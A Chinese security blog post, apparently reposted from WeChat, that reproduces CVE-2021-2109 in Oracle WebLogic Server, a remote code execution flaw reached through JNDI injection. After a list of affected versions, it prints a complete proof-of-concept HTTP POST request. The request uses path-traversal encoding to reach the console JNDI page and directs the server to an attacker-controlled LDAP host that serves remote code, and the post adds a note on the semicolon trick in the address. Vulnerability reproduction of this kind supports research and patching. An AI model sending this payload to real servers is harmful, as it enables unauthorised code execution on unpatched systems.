【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

admin 2021年1月21日05:47:14评论610 views字数 1514阅读5分2秒阅读模式

0x01 前言

CVE-2021-2109,该漏洞为Weblogic的远程代码执行漏洞。漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

0x02 影响版本

    Weblogic Server 10.3.6.0.0    Weblogic Server 12.1.3.0.0    Weblogic Server 12.2.1.3.0    Weblogic Server 12.2.1.4.0    Weblogic Server 14.1.1.0.0


0x03 环境搭建

本次环境用的之前搭建的,不做过多介绍,详细搭建过程参考上一篇

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

所用到的工具网上都有,也可后台回复"CVE-2021-2109"获取

0x04 漏洞复现

PoC:

POST /console/css/%252e%252e%252f/consolejndi.portal HTTP/1.1Host: 192.168.46.133:7001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: ADMINCONSOLESESSION=2BYjPffl4uJEwegmeojCoLD4tJU-FOMPojHKs1usTlL-rS1iMAYD!-818656581Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 164
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.46;133:1389/g9ey7l;AdminServer%22)

这有个小细节就是ldap地址是用分号,这个地方我就踩了个坑,没仔细看poc【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现试了好几次才发现【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现


0x05 参考链接

https://mp.weixin.qq.com/s/QNz75BZOXK8DqmoTAwbV9ghttps://twitter.com/jas502n/status/1352076921190850563/photo/1

【往期推荐】

未授权访问漏洞汇总

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

记一次HW实战笔记 | 艰难的提权爬坑

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

走过路过的大佬们留个关注再走呗【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

往期文章有彩蛋哦【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

本文始发于微信公众号(渗透Xiao白帽):【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年1月21日05:47:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现http://cn-sec.com/archives/247691.html

发表评论

匿名网友 填写信息